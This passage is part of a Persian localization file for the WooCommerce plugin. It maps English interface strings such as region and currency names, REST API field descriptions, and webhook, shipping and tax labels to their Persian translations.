نامعتبر','Zamfara'=>'Zamfara','Yobe'=>'Yobe','Taraba'=>'Taraba','Sokoto'=>'Sokoto','Rivers'=>'Rivers','Plateau'=>'Plateau','Oyo'=>'Oyo','Osun'=>'Osun','Ondo'=>'Ondo','Ogun'=>'Ogun','Nasarawa'=>'Nasarawa','Lagos'=>'Lagos','Kwara'=>'Kwara','Kogi'=>'Kogi','Kebbi'=>'Kebbi','Katsina'=>'Katsina','Kano'=>'Kano','Kaduna'=>'Kaduna','Jigawa'=>'Jigawa','Imo'=>'Imo','Gombe'=>'Gombe','Enugu'=>'Enugu','Ekiti'=>'Ekiti','Edo'=>'Edo','Ebonyi'=>'Ebonyi','Delta'=>'Delta','Cross River'=>'Cross River','Borno'=>'Borno','Benue'=>'Benue','Bayelsa'=>'Bayelsa','Bauchi'=>'Bauchi','Anambra'=>'Anambra','Akwa Ibom'=>'Akwa Ibom','Adamawa'=>'Adamawa','Abuja'=>'Abuja','Abia'=>'Abia','L\'Aquila'=>'L\'Aquila','To manipulate product variations you should use the /products/<product_id>/variations/<id> endpoint.'=>'برای اعمال تغییرات محصول شما باید بکار برید /products/<product_id>/variations/<id> ارجاع.','Wexford'=>'Wexford','Wicklow'=>'Wicklow','Westmeath'=>'Westmeath','Waterford'=>'Waterford','Tipperary'=>'Tipperary','Sligo'=>'Sligo','Roscommon'=>'Roscommon','Offaly'=>'Offaly','Mayo'=>'Mayo','Monaghan'=>'Monaghan','Meath'=>'Meath','Laois'=>'Laois','Leitrim'=>'Leitrim','Limerick'=>'Limerick','Louth'=>'Louth','Longford'=>'Longford','Kerry'=>'Kerry','Kilkenny'=>'Kilkenny','Kildare'=>'Kildare','Galway'=>'Galway','Dublin'=>'Dublin','Donegal'=>'Donegal','Carlow'=>'Carlow','Cavan'=>'Cavan','Cork'=>'Cork','Clare'=>'Clare','Ireland'=>'Ireland','Limit result set to specific IDs.'=>'نتجه محدود تنظیم شده برای تعریف شناسه‌ها.','Webhook delivery URL.'=>'Webhook آدرس اینترنتی تحویل.','Unique slug for the resource.'=>'نامک یکتا برای منبع.','Review content.'=>'بررسی محتوا.','The order ID.'=>'شناسه سفارش.','Ensure result set excludes specific IDs.'=>'اطمینان از مجموعه نتیجه مستثنی شناسه خاص.','Unique identifier for the variable product.'=>'شناسه یکتا برای محصول متغیر.','New user password.'=>'کلمه عبور کاربر جدید.','New user username.'=>'نام کاربری کاربر جدید.','New user email address.'=>'آدرس ایمیل کاربر جدید.','Name for the resource.'=>'نام برای منبع.','Unique identifier for the attribute of the terms.'=>'شناسه منحصر به فرد برای ویژگی از شرایط.','Order note content.'=>'محتوای یاداشت سفارش.','Unique identifier for the webhook.'=>'شناسه یکتا برای Webhook.','Email of the reviewer.'=>'ایمیل بررسی کننده.','Name of the reviewer.'=>'نام بررسی کننده.','Unique identifier for the variation.'=>'شناسه یکتا برای متغیر.','ID to reassign posts to.'=>'شناسه جابه جا نوشته به.','#%s is an invalid image ID.'=>'#%s شناسه تصویر معتبر نیست.','WooCommerce extensions'=>'افزونه‌های ووکامرس','Installed'=>'نصب شده','Extensions'=>'افزودنی‌ها','https://woocommerce.com'=>'https://woocommerce.com','Force SSL (HTTPS) on the checkout pages (an SSL Certificate is required).'=>'اجبار به استفاده از SSL (HTTPS) در صفحات تسویه حساب (یک گواهینامه SSL ضروری است).','Invalid email type.'=>'نوع ایمیل نامعتبر است.','https://woocommerce.com/'=>'https://woocommerce.com/','If the variation is visible.'=>'اگر تغییر قابل مشاهده است.','Everywhere'=>'همه جا','Enable shipping debug mode to show matching shipping zones and to bypass shipping rate cache.'=>'فعال کردن حالت اشکل زدایی حمل و نقل جهت نمایش هماهنگی مناطق حمل و نقل و جهت دور زدن کش نرخ حمل و نقل.','Choose the shipping method you wish to add. Only shipping methods which support zones are listed.'=>'روش حمل ونقلی که می‌خواهید اضافه کنید انتخاب نمایید. تنها روش‌های حمل و نقلی که مناطق را پشتیبانی می‌ کنند، لیست شده اند.','No shipping methods offered to this zone.'=>'هیچ روش حمل و نقلی برای این منطقه ارائه نشده است.','Endpoints are appended to your page URLs to handle specific actions on the accounts pages. They should be unique and can be left blank to disable the endpoint.'=>'نقطه ورود اضافه می‌شود به آدرس برگه برای رسیدگی به اقدامات خاص در برگه‌های حساب کاربری. آنها باید منحصر به فرد باشند می‌توانید خالی بگذارید تا نقطه ورود غیرفعال شود.','Error: %s.'=>'خطا: %s.','Use [qty] for the number of items,
[cost] for the total cost of items, and [fee percent="10" min_fee="20" max_fee=""] for percentage based fees.'=>'از [qty] برای تعداد آیتم‌ها،
[cost] برای کل مبالغ آیتم‌ها، و از [fee percent="10" min_fee="20" max_fee=""] برای هزینه‌ها بر اساس درصد استفاده نمائید.','North Korean won'=>'North Korean won','Endpoint for the "My account → Downloads" page.'=>'ارجاع به صفحه " حساب کاربری من ; دانلودها ".','Endpoint for the "My account → Orders" page.'=>'ارجاع به صفحه " حساب کاربری من ; سفارشات ".','Password reset email has been sent.'=>'ایمیل بازنشانی رمزعبور ارسال گردید.','A password reset email has been sent to the email address on file for your account, but may take several minutes to show up in your inbox. Please wait at least 10 minutes before attempting another reset.'=>'ایمیل بازنشانی گذرواژه به آدرس ایمیل موجود در حساب کاربری شما فرستاده شد، اما ممکن است چند دقیقه طول بکشد تا در اینباکس ایمیل شما نمایش داده شود. لطفا حداقل 10 دقیقه صبر کنید قبل از اینکه درخواست جدیدی برای بازنشانی گذرواژه ارسال کنید.','No order has been made yet.'=>'هیچ سفارشی هنوز ثبت نشده است.','No downloads available yet.'=>'هیچ دانلودی در دسترس نیست.','Order #%1$s was placed on %2$s and is currently %3$s.'=>'سفارش #%1$s در تاریخ %2$s ثبت شده است و در حال حاضر در وضعیت %3$s می‌باشد.','Next'=>'بعدی','Previous'=>'قبلی','No saved methods found.'=>'هیچ روش ذخیره شده ای یافت نشد.','∞'=>'بی‌نهایت;','%1$s is not of type %2$s'=>'%1$s نیست از نوع %2$s','Error getting remote image %s.'=>'خطا در گرفتن تصویر از راه دور %s.','Invalid URL %s.'=>'آدرس URL %s نامعتبراست.','Zambian kwacha'=>'Zambian kwacha','Yemeni rial'=>'Yemeni rial','CFP franc'=>'CFP franc','West African CFA franc'=>'West African CFA franc','East Caribbean dollar'=>'East Caribbean dollar','Central African CFA franc'=>'Central African CFA franc','Samoan tālā'=>'Samoan tālā','Vanuatu vatu'=>'Vanuatu vatu','Vietnamese đồng'=>'Vietnamese đồng','Venezuelan bolívar'=>'Venezuelan bolívar','Uzbekistani som'=>'Uzbekistani som','Uruguayan peso'=>'Uruguayan peso','Ugandan shilling'=>'Ugandan shilling','Tanzanian shilling'=>'Tanzanian shilling','New Taiwan dollar'=>'New Taiwan dollar','Trinidad and Tobago dollar'=>'Trinidad and Tobago dollar','Tongan paʻanga'=>'Tongan paʻanga','Tunisian dinar'=>'Tunisian dinar','Turkmenistan manat'=>'Turkmenistan manat','Tajikistani somoni'=>'Tajikistani somoni','Swazi lilangeni'=>'Swazi lilangeni','Syrian pound'=>'Syrian pound','São Tomé and Príncipe dobra'=>'São Tomé and Príncipe dobra','South Sudanese pound'=>'South Sudanese pound','Surinamese dollar'=>'Surinamese dollar','Somali shilling'=>'Somali shilling','Sierra Leonean leone'=>'Sierra Leonean leone','Saint Helena pound'=>'Saint Helena pound','Sudanese pound'=>'Sudanese pound','Seychellois rupee'=>'Seychellois rupee','Solomon Islands dollar'=>'Solomon Islands dollar','%s product'=>'%s محصولات','Rwandan franc'=>'Rwandan franc','Serbian dinar'=>'Serbian dinar','Paraguayan guaraní'=>'Paraguayan guaraní','Transnistrian ruble'=>'Transnistrian ruble','Polish złoty'=>'Polish złoty','Papua New Guinean kina'=>'Papua New Guinean kina','Panamanian balboa'=>'Panamanian balboa','Omani rial'=>'Omani rial','Nepalese rupee'=>'Nepalese rupee','Nicaraguan córdoba'=>'Nicaraguan córdoba','Namibian dollar'=>'Namibian dollar','Mozambican metical'=>'Mozambican metical','Qatari riyal'=>'Qatari riyal','Iranian rial'=>'ریال ایران','Malawian kwacha'=>'Malawian kwacha','Maldivian rufiyaa'=>'Maldivian rufiyaa','Mauritian rupee'=>'Mauritian rupee','Mauritanian ouguiya'=>'Mauritanian ouguiya','Macanese pataca'=>'Macanese pataca','Mongolian tögrög'=>'Mongolian tögrög','Burmese kyat'=>'Burmese kyat','Macedonian denar'=>'Macedonian denar','Malagasy ariary'=>'Malagasy ariary','Moldovan leu'=>'Moldovan leu','Moroccan dirham'=>'Moroccan dirham','Libyan dinar'=>'Libyan dinar','Lesotho loti'=>'Lesotho loti','Liberian dollar'=>'Liberian dollar','Sri Lankan rupee'=>'Sri Lankan rupee','Lebanese pound'=>'Lebanese pound','Kazakhstani tenge'=>'Kazakhstani tenge','Cayman Islands dollar'=>'Cayman Islands dollar','Kuwaiti dinar'=>'Kuwaiti dinar','Comorian franc'=>'Comorian franc','Cambodian riel'=>'Cambodian riel','Kyrgyzstani som'=>'Kyrgyzstani som','Jordanian dinar'=>'Jordanian dinar','Jamaican dollar'=>'Jamaican dollar','Jersey pound'=>'Jersey pound','Icelandic króna'=>'Icelandic króna','Iraqi dinar'=>'Iraqi dinar','Manx pound'=>'Manx pound','Israeli new shekel'=>'Israeli new shekel','Haitian gourde'=>'Haitian gourde','Honduran lempira'=>'Honduran lempira','Guyanese dollar'=>'Guyanese dollar','Guatemalan quetzal'=>'Guatemalan quetzal','Guinean franc'=>'Guinean franc','Gambian dalasi'=>'Gambian dalasi','Gibraltar pound'=>'Gibraltar pound','Ghana cedi'=>'Ghana cedi','Guernsey pound'=>'Guernsey pound','Georgian lari'=>'Georgian lari','Falkland Islands pound'=>'Falkland Islands pound','Fijian dollar'=>'Fijian dollar','Euro'=>'Euro','Ethiopian birr'=>'Ethiopian birr','Eritrean nakfa'=>'Eritrean nakfa','Algerian dinar'=>'Algerian dinar','Djiboutian franc'=>'Djiboutian franc','Cape Verdean escudo'=>'Cape Verdean escudo','Cuban peso'=>'Cuban peso','Cuban convertible peso'=>'Cuban convertible peso','Costa Rican colón'=>'Costa Rican colón','Congolese franc'=>'Congolese franc','Belize dollar'=>'Belize dollar','Belarusian ruble'=>'Belarusian ruble','Botswana pula'=>'Botswana pula','Bhutanese ngultrum'=>'Bhutanese ngultrum','Bitcoin'=>'Bitcoin','Bahamian dollar'=>'Bahamian dollar','Bolivian boliviano'=>'Bolivian boliviano','Brunei dollar'=>'Brunei dollar','Bermudian dollar'=>'Bermudian dollar','Burundian franc'=>'Burundian franc','Bahraini dinar'=>'Bahraini dinar','Limit results to those matching a string.'=>'محدود کردن نتایج به آن یک رشته تطبیق شده.','Once disabled, this legacy method will no longer be available.'=>'یکبار غیرفعال کنید، این روش دیگر دردسترس نخواهد بود.','Maximum number of items to be returned in result set.'=>'حداکثر تعداد اقلام در مجموعه نتیجه بازگردانده می شود.','Every %d minutes'=>'هر %d دقیقه','International flat rate (legacy)'=>'نرخ ثابت بین المللی (همانند قبلی)','Flat rate (legacy)'=>'نرخ ثابت (همانند قبلی)','Current page of the collection.'=>'صفحه فعلی مجموعه.','The date you provided is invalid.'=>'تاریخی که ارائه کرده اید نامعتبر است.','Optional cost for local pickup.'=>'مبلغ اختیاری برای دریافت حضوری.','Allow customers to pick up orders themselves. By default, when using local pickup store base taxes will apply regardless of customer address.'=>'اجازه دادن به مشتری‌ها برای دریافت حضوری سفارش‌‌شان. بطور پیشفرض، وقتی از دریافت حضوری استفاده می‌کنید، مالیات‌های برپایه‌ی فروشگاه، صرف نظر از آدرس مشتری اعمال خواهد شد.','Local pickup (legacy)'=>'دریافت حضوری (سابق)','File'=>'فایل','Free shipping (legacy)'=>'حمل و نقل رایگان (همانند قبل)','This method is deprecated in 2.6.0 and will be removed in future versions - we recommend disabling it and instead setting up a new rate within your Shipping zones.'=>'این روش در 2.6.0 منسوخ شده است و در نسخه‌های آینده حذف خواهد شد - پیشنهاد می کنیم آن را غیرفعال کرده و به جای آن، یک نرخ جدید در مناطق حمل و نقل تنظیم نمائید.','Free shipping is a special method which can be triggered with coupons and minimum spends.'=>'حمل و نقل رایگان یک روش خاص است که می تواند با کدهای تخفیف و حداقل خرید فعال شود.','Expires'=>'انقضا','Lets you charge a fixed rate for shipping.'=>'به شما اجازه می دهد یک نرخ ثابت برای حمل و نقل، شارژ کنید.','A minimum order amount'=>'حداقل مبلغ سفارش','Dashboard'=>'پیشخوان','Local delivery (legacy)'=>'تحویل محلی (قدیمی)','Barbadian dollar'=>'Barbadian dollar','Bosnia and Herzegovina convertible mark'=>'Bosnia and Herzegovina convertible mark','Azerbaijani manat'=>'Azerbaijani manat','Aruban florin'=>'Aruban florin','Angolan kwanza'=>'Angolan kwanza','Netherlands Antillean guilder'=>'Netherlands Antillean guilder','Armenian dram'=>'Armenian dram','Albanian lek'=>'Albanian lek','Afghan afghani'=>'Afghan afghani','Scope under which the request is made; determines fields present in response.'=>'دامنه ای که تحت آن درخواست ارائه شده است; تعیین پاسخ در آن زمینه.','eCheck'=>'چک الکترونیکی','Make default'=>'تنظیم به عنوان پیشفرض','Go to shop'=>'برو به فروشگاه','Limit result set to webhooks assigned a specific status.'=>'نتیجه حد webhooks اختصاص یک وضعیت خاص تنظیم کنید.','The date the webhook was last modified, in the site\'s timezone.'=>'تاریخ webhook آخرین ویرایش،براساس منطقه زمانی سایت.','The date the webhook was created, in the site\'s timezone.'=>'تاریخ ایجاد webhook، براساس منطقه زمانی سایت.','Secret key used to generate a hash of the delivered webhook and provided in the request headers. This will default to a MD5 hash from the current user\'s ID|username if not provided.'=>'کلید سری برای تولید hash تحویل webhook که در سربرگ‌ها ارائه می شود است.پیشفرض MD5 hash از شناسه کاربرفعلی|نام‌کاربری اگر ارائه نشده باشد.','The delivery duration, in seconds.'=>'مدت تحویل، در ثانیه.','Indicates the order that will appear in queries.'=>'سفارش که ظاهر می شود در کوئری‌ها نشان داده می شود.','Taxes do not support trashing.'=>'مالیات از حذف شده‌ها پشتیبانی نمی کند.','A human-readable description of the resource.'=>'توضیحات منابع قابل خواندن توسط انسان.','An alphanumeric identifier for the resource.'=>'الفبایی مشخص کننده برای منابع.','The URL where the webhook payload is delivered.'=>'آدرس که webhook محموله تحویل داده شده است.','WooCommerce action names associated with the webhook.'=>'نام اقدامات ووکامرس همراه شده است با webhook.','Webhook topic is required and must be valid.'=>'Webhook تاپیک ضروری است و باید معتبر باشد.','The response body from the receiving server.'=>'بدنه پاسخ از سرور گیرنده.','Array of the response headers from the receiving server.'=>'آرایه از سربرگ‌های پاسخ دهنده از سرور گیرنده.','The URL where the webhook was delivered.'=>'آدرسی که webhook تحویل داده شده بود.','Webhook delivery URL must be a valid URL starting with http:// or https://.'=>'Webhook آدرس برگشتی باید معتبر بوده و با http:// یا https://. شروع شود.','A friendly summary of the response including the HTTP response code, message, and body.'=>'خلاصه ای دوستانه از پاسخی که کد پاسخHTTP، پیام و بدنه است.','Undo?'=>'بازگشت؟','Return to emails'=>'بازگشت به ایمیل‌ها','Webhook event.'=>'Webhook رویداد.','%1$s was installed but could not be activated. Please activate it manually by clicking here.'=>'%1$s نصب شده است اما نمی تواند فعال شود. لطفا آن را به صورت دستی با کلیک روی اینجا فعال کنید.','%1$s could not be installed (%2$s). Please install it manually by clicking here.'=>'%1$s نمی تواند نصب شود (%2$s). لطفا با کلیک روی اینجا آن را به صورت دستی نصب کنید.','Postcode / ZIP.'=>'کدپستی.','Payment method deleted.'=>'روش پرداخت حذف شد.','State code.'=>'کد استان.','Country ISO 3166 code.'=>'کد ISO 3166 کشور.','Tax class name.'=>'نام کلاس مالیاتی.','List of top sellers products.'=>'لیست پرفروش ترین محصولات.','Tax rate name.'=>'نام نرخ مالیاتی.','Tax priority.'=>'اولویت مالیاتی.','Whether or not this is a compound rate.'=>'خواه ناخواه این یک نرخ ترکیبی است.','Whether or not this tax rate also gets applied to shipping.'=>'خواه ناخواه این نرخ مالیات به حمل و نقل نیز اعمال می شود.','Please enter an address to continue.'=>'جهت ادامه، یک آدرس وارد نمائید.','No shipping method has been selected. Please double check your address, or contact us if you need any help.'=>'هیچ روش حمل و نقلی انتخاب نشده است. لطفا آدرس خود را دوباره بررسی نمائید، یا در صورت نیاز به هرگونه کمک، با ما تماس بگیرید.','List of sales reports.'=>'لیست گزارش‌های فروش.','Tax rate.'=>'نرخ مالیات.','Return to shop'=>'بازگشت به فروشگاه','Products list'=>'فهرست محصولات','Order on-hold'=>'سفارش در انتظار بررسی','Zone'=>'منطقه','Insert into product'=>'درج در محصول','Products navigation'=>'ناوبری محصولات','Uploaded to this product'=>'آپلود شده در این محصول','Orders navigation'=>'ناوبری سفارشات','Orders list'=>'فهرست سفارشات','Coupons navigation'=>'ناوبری کدهای تخفیف','Coupons list'=>'فهرست کدهای تخفیف','Orders (page %d)'=>'سفارشات (برگه %d)','No "%s" found'=>'هیچ "%s" یافت نشد','Webhook resource.'=>'Webhook منابع.','Webhook topic.'=>'Webhook تاپیک.','Webhook status.'=>'Webhook وضعیت.','A friendly name for the webhook.'=>'نام دوستانه برای Webhook .','Webhook topic must be valid.'=>'Webhook تاپیک باید معتبر باش.','The date the webhook delivery was logged, in the site\'s timezone.'=>'تاریخ webhook برگشتی وارد شده براساس منطقه زمانی سایت.','The HTTP response message from the receiving server.'=>'پیام پاسخ HTTP از سرور گیرنده.','The HTTP response code from the receiving server.'=>'کد پاسخ HTTP از سرور گیرنده.','Request body.'=>'بدنه درخواست.','Request headers.'=>'سربرگ‌های درخواست.','Invalid webhook ID.'=>'شناسه webhook نامعتبر.','Sort by tax class.'=>'مرتب‌سازی بر اساس کلاس مالیاتی.','This payment method was successfully set as your default.'=>'این روش پرداخت با موفقیت به صورت پیشفرض قرار داده شد.','%s and %d other region'=>'%s و %d ناحیه دیگر','Filter coupons'=>'صافی کوپن‌ها','Filter orders'=>'صافی سفارش‌ها','Filter products'=>'صافی محصولات','List of grouped products ID.'=>'لیستی از گروه شناسه محخصولات.','Limit result set to products with a specific attribute.'=>'نتیجه محدود به محصولات خاص با تعریف ویژگی.','Limit result set to products assigned a specific type.'=>'نتیجه محدود به محصولات ختصاص یک نوع خاص.','List of available term names of the attribute.'=>'فهرست شرایط موجود نام‌های ویژگی.','Category archive display type.'=>'نوع نمایش بایگانی دسته.','Image alternative text.'=>'تصویر متن جایگزین.','If managing stock, this controls if backorders are allowed.'=>'اگر نبار را مدیریت می کنید،این کنترل‌ها اگر بازگشت کالا مجاز باشد.','HTML description of the resource.'=>'کد HTML توضیحات منابع.','An alphanumeric identifier for the resource unique to its type.'=>'یک شناسه الفبایی برای منابع منحصر به فرد به نوع آن است.','MD5 hash of cart items to ensure orders are not modified.'=>'MD5 hash محصولات سبدخرید برای اطمینان از تغییر نکردن آنها.','User agent of the customer.'=>'عامل کاربر از مشتری است.','Limit result set to products with a specific slug.'=>'مجموعه نتیجه محدود به محصولات با نامک خاص.','Limit result set to products with a specific attribute term ID (required an assigned attribute).'=>'نتیجه محدود به محصولات با خاصیت شرایط ویژه ( نیازمند تعریف ویژگی).','Limit result set to products assigned a specific tag ID.'=>'نتیجه محدود به محصولات اختصاص یک برچسب خاص.','The ID for the parent of the resource.'=>'شناسه برای والد منابع.','Shipping lines data.'=>'خط اطلاعات حمل و نقل.','Product width (%s).'=>'عرض محصول (%s).','Payment method title.'=>'عنوان روش پرداخت.','Product length (%s).'=>'طول محصول (%s).','Payment method ID.'=>'شناسه روش پرداخت.','Tag ID.'=>'شناسه برچسب.','Image ID.'=>'شناسه تصویر.','User ID who owns the order. 0 for guests.'=>'شناسه کاربری کسی که صاحب سفارش است. 0 برای میهمانان.','Attribute ID.'=>'شناسه ویژگی.','Customer ID is invalid.'=>'شناسه مشتری نامعتبر است.','Product parent ID.'=>'شناسه محصول اصلی (والد).','Product ID or SKU is required.'=>'شناسه محصول یا SKU مورد نیاز است.','Fee lines data.'=>'سطرهای اطلاعات هزینه.','Line total tax (after discounts).'=>'سطر مجموع مالیات (بعد از تخفیف).','Line total (after discounts).'=>'سطر مجموع (بعد از تخفیف).','Line taxes.'=>'سطر مالیات.','Tax lines data.'=>'داده‌های سطرهای مالیات.','Image data.'=>'داده‌های تصویر.','Report period.'=>'دوره گزارش.','Image position. 0 means that the image is featured.'=>'جایگاه تصویر. 0 به این معنی است که تصویر برگزیده است.','Discount total.'=>'جمع تخفیف.','Total discount tax amount for the order.'=>'جمع تخفیف مالیاتی سفارش.','Discount total tax.'=>'جمع تخفیف مالیات.','Totals.'=>'جمع کل.','Grand total.'=>'جمع کل.','Sum of all taxes.'=>'جمع همه مالیات‌ها.','Total discount amount for the order.'=>'جمع مبلغ تخفیف برای سفارش.','Sum of line item taxes only.'=>'جمع مالیات اقلام هر خط به تنهایی.','Tax total (not including shipping taxes).'=>'جمع مالیات (بدون مالیات‌های حمل و نقل).','Quantity ordered.'=>'تعداد سفارشات.','Number of decimal points to use in each resource.'=>'تعداد رقم اعشار برای استفاده در هر منبع.','Total number of purchases.'=>'تعداد کل خریدها.','Amount of reviews that the product have.'=>'تعداد نظرات و دیدگاه‌هایی که محصول دارد.','Define if the order is paid. It will set the status to processing and reduce stock items.'=>'تعیین کنید اگر سفارش پرداخت شده است. آن را در وضعیت در حال انجام قرار داده و اقلام سفارش را در انبار کاهش بده.','Define if the attribute is visible on the "Additional information" tab in the product\'s page.'=>'تعیین کن اگر ویژگی قابل مشاهده است در تب "اطلاعات بیشتر" در برگه محصول.','The date the order was completed, in the site\'s timezone.'=>'تاریخ تکمیل سفارش. در منطقه زمانی سایت.','The date the review was created, in the site\'s timezone.'=>'تاریخ ایجاد دیدگاه، در منطقه زمانی سایت.','The date the image was created, in the site\'s timezone.'=>'تاریخ ایجاد تصویر، در منطقه زمانی سایت.','The date the product was created, in the site\'s timezone.'=>'تاریخ ایجاد محصول، در منطقه زمانی سایت.','The date the image was last modified, in the site\'s timezone.'=>'تاریخ آخرین ویرایش تصویر، در منطقه زمانی سایت.','The date the product was last modified, in the site\'s timezone.'=>'تاریخ آخرین ویرایش محصول، در منطقه زمانی سایت.','The date the order was paid, in the site\'s timezone.'=>'تاریخ پرداخت سفارش. در منطقه زمانی سایت.','Review rating (0 to 5).'=>'بررسی امتیاز (0 تا 5).','Return sales for a specific start date, the date need to be in the %s format.'=>'بازگشت به فروش‌ها برای یک تاریخ شروع خاص، تاریخ باید به فرمت %s باشد.','Return sales for a specific end date, the date need to be in the %s format.'=>'بازگشت به فروش‌ها برای یک تاریخ پایان خاص، تاریخ باید به فرمت %s باشد.','Product height (%s).'=>'ارتفاع محصول (%s).','Allow one item to be bought in a single order.'=>'اجازه بده یک قلم در هر سفارش خریداری شود.','Allow reviews.'=>'اجازه نوشتن دیدگاه.','Product dimensions.'=>'ابعاد محصول.','If the product is virtual.'=>'اگر محصول مجازی است.','If the product is downloadable.'=>'اگر محصول قابل دانلود است.','True the prices included tax during checkout.'=>'اگر قیمت شامل مالیات است در طی فرایند پرداخت نشان بده.','Reviewer email.'=>'ایمیل بررسی کننده.','Customer\'s IP address.'=>'آدرس IP مشتری.','Tax class of product.'=>'کلاس مالیاتی محصول.','Total of orders placed.'=>'کل سفارش‌های قرار داده شده.','Note left by customer during checkout.'=>'یادداشت گذاشته شده توسط مشتری در طی پرداخت.','Optional note to send the customer after purchase.'=>'یادداشت یادداشت اختیاری برای ارسال به مشتری پس از خرید.','Product status (post status).'=>'وضعیت محصول (وضعیت پست).','Tax status.'=>'وضعیت مالیات.','Product weight (%s).'=>'وزن محصول (%s).','Currency the order was created with, in ISO format.'=>'واحد پولی که سفارش با آن ایجاد شده است، در فرمت ISO.','Shows where the order was created.'=>'نشان بده سفارش کجا ایجاد شده است.','Shows if the product is on backordered.'=>'نشان بده اگر محصول در حالت پیش خرید است.','Shows if the product is on sale.'=>'نشان بده اگر محصول در حال فروش ویژه است.','Shows if the product need to be shipped.'=>'نشان بده اگر محصول نیاز به ارسال دارد.','Shows if the product can be bought.'=>'نشان بده اگر محصول می تواند خریداری شود.','Shows if backorders are allowed.'=>'نشان بده پیش خریدها مجازند.','Shows if the reviewer bought the product or not.'=>'نشان بده نویسنده دیدگاه خریدار محصول است یا خیر.','Limit result set to orders assigned a specific product.'=>'نتیجه محدود به تنظیم مرتب‌سازی محصول خاص.','Selected attribute term name.'=>'نام شرط ویژگی را انتخاب کنید.','Reviewer name.'=>'نام بررسی کننده.','Image name.'=>'نام تصویر.','Tag name.'=>'نام برچسب.','Fee name is required.'=>'نام هزینه ضروری است.','Download type, this controls the schema on the front-end.'=>'نوع دانلود، این کنترها در نمای سایت نمایش داده می شوند.','Group type.'=>'نوع گروه.','Product type.'=>'نوع محصول.','Stock management at product level.'=>'مدیریت انبار در سطح محصول.','Invalid product.'=>'محصول نامعتبر است.','Total of refunded orders.'=>'مجموعه هزینه برگشتی سفارش‌ها.','Total of items purchased.'=>'مجموع اقلام خریداری شده.','Total of coupons used.'=>'مجموع کدهای تخفیف استفاده شده.','Total charged for taxes.'=>'مجموع هزینه برای مالیات.','Tax total.'=>'مجموع مالیات.','Product external button text. Only for external products.'=>'متن دکمه محصول خارجی. فقط برای محصولات خارجی.','Amount of sales.'=>'میزان فروش.','Reviews average rating.'=>'میانگین امتیاز بررسی‌ها.','Average net daily sales.'=>'میانگین فروش خالص روزانه.','Stock quantity.'=>'موجودی انبار.','Attribute position.'=>'موقعیت ویژگی.','Product external URL. Only for external products.'=>'لینک خارجی محصول. فقط برای محصولات خارج سایت.','Product URL.'=>'لینک محصول.','Product price.'=>'قیمت محصول.','Net sales in the period.'=>'فروش خالص دوره.','Gross sales in the period.'=>'فروش ناخالص دوره.','List of up-sell products IDs.'=>'فهرست شناسه‌های محصولات دارای فروش بیشتر.','List of cross-sell products IDs.'=>'فهرست شناسه‌های محصولات جایگزین با کیفیت و ارزش بالاتر.','List of images.'=>'فهرست تصاویر.','List of tags.'=>'فهرست برچسب‌ها.','List of refunds.'=>'فهرست بازپرداخت‌ها.','List of attributes.'=>'فهرست ویژگی‌ها.','List of downloadable files.'=>'فهرست فایل‌های قابل دانلود.','Coupons line data.'=>'داده ردیف کدهای تخفیف.','Coupon code is required.'=>'کدتخفیف الزامی است.','Variation ID, if applicable.'=>'شناسه تنوع اگر قابل اجرا است.','Variation sale price.'=>'قیمت فروش متغیر.','Define if the attribute can be used as variation.'=>'تعیین کن که ویژگی می تواند استفاده شود برای متغیر‌ها.','Variation height (%s).'=>'ارتفاع متغیر (%s).','Variation dimensions.'=>'ابعاد متغیر.','Variation URL.'=>'آدرس متغیر.','Shows if the variation is on backordered.'=>'نشان می دهد که آیا این متغیر در سفارش مجدد است.','Variation regular price.'=>'قیمت عادی این متغیر.','Variation weight (%s).'=>'وزن متغیر (%s).','Variation width (%s).'=>'عرض متغیر (%s).','Variation length (%s).'=>'طول متغیر (%s).','Current variation price.'=>'قیمت کنونی متغیر.','Variation ID.'=>'شناسه متغیر.','List of variations.'=>'لیست متغیرها.','If the variation is virtual.'=>'اگر متغیر مجازی است.','If the variation is downloadable.'=>'اگر متغیر قابل دانلود است.','Shows if the variation is on sale.'=>'اگر متغیر بصورت فروش ویژه باشد نشان داده می شود.','Shows if the variation can be bought.'=>'اگر متغیر را می توان خرید نشان می دهد.','The date the variation was created, in the site\'s timezone.'=>'تاریخ آخرین متغیر ایجاد شده در منطقه زمانی سایت.','The date the variation was last modified, in the site\'s timezone.'=>'تاریخ آخرین ویرایش متغیر، در منطقه زمانی سایت.','Line subtotal tax (before discounts).'=>'سطر جمع جزء مالیات (قبل از تخفیف).','Line subtotal (before discounts).'=>'سطر جمع جزء (قبل از تخفیف).','Tax subtotal.'=>'جمع جزء مالیات.','Menu order, used to custom sort products.'=>'ترتیب فهرست، برای مرتب کردن دلخواه محصولات استفاده کنید.','Limit result set to products assigned a specific shipping class ID.'=>'مجموعه نتیجه را به محصولات انتساب داده شده به یک شناسه کلاس حمل و نقل خاص، محدود کن.','Shipping class slug.'=>'نامک کلاس حمل و نقل.','Refund total.'=>'مجموع بازپرداخت.','Refund reason.'=>'دلیل بازپرداخت.','End date of sale price.'=>'تاریخ پایان قیمت ویژه.','Billing address.'=>'آدرس صورت حساب.','Shipping method name.'=>'نام روش حمل و نقل.','Fee name.'=>'نام هزینه.','Parent order ID.'=>'شناسه سفارش والد.','Order status.'=>'وضعیت سفارش.','Unique transaction ID.'=>'شناسه یکتای تراکنش.','Tax rate label.'=>'برچسب نرخ مالیاتی.','Tax rate code.'=>'کد نرخ مالیاتی.','Show if is a compound tax rate.'=>'اگر یک نرخ مالیاتی ترکیبی است، نشان بده.','Tax class of fee.'=>'کلاس مالیاتی هزینه.','Tax status of fee.'=>'وضعیت مالیاتی هزینه.','Featured product.'=>'محصول ویژه.','Catalog visibility.'=>'نمایان بودن کاتالوگ.','Product description.'=>'توضیحات محصول.','Product short description.'=>'توضیح کوتاه محصول.','Unique identifier.'=>'شناسه یکتا.','Current product price.'=>'قیمت فعلی محصول.','Product regular price.'=>'قیمت عادی محصول.','Product sale price.'=>'قیمت فروش ویژه محصول.','Start date of sale price.'=>'تاریخ شروع فروش ویژه.','Price formatted in HTML.'=>'قیمت فرمت بندی شده در HTML.','Total charged for shipping.'=>'مجموع هزینه اعمال شده برای حمل و نقل.','Shipping class ID.'=>'شناسه کلاس حمل و نقل.','Shows whether or not the product shipping is taxable.'=>'خواه ناخواه نشان می دهد که حمل و نقل محصول مشمول مالیات می شود.','Shipping class name.'=>'نام کلاس حمل و نقل.','Number of published products for the resource.'=>'تعداد محصولات منتشر شده برای منبع.','Shipping method ID.'=>'شناسه روش حمل و نقل.','Shipping tax total.'=>'مجموع مالیات حمل و نقل.','Shipping address.'=>'آدرس حمل و نقل.','Total shipping tax amount for the order.'=>'جمع مبلغ مالیات 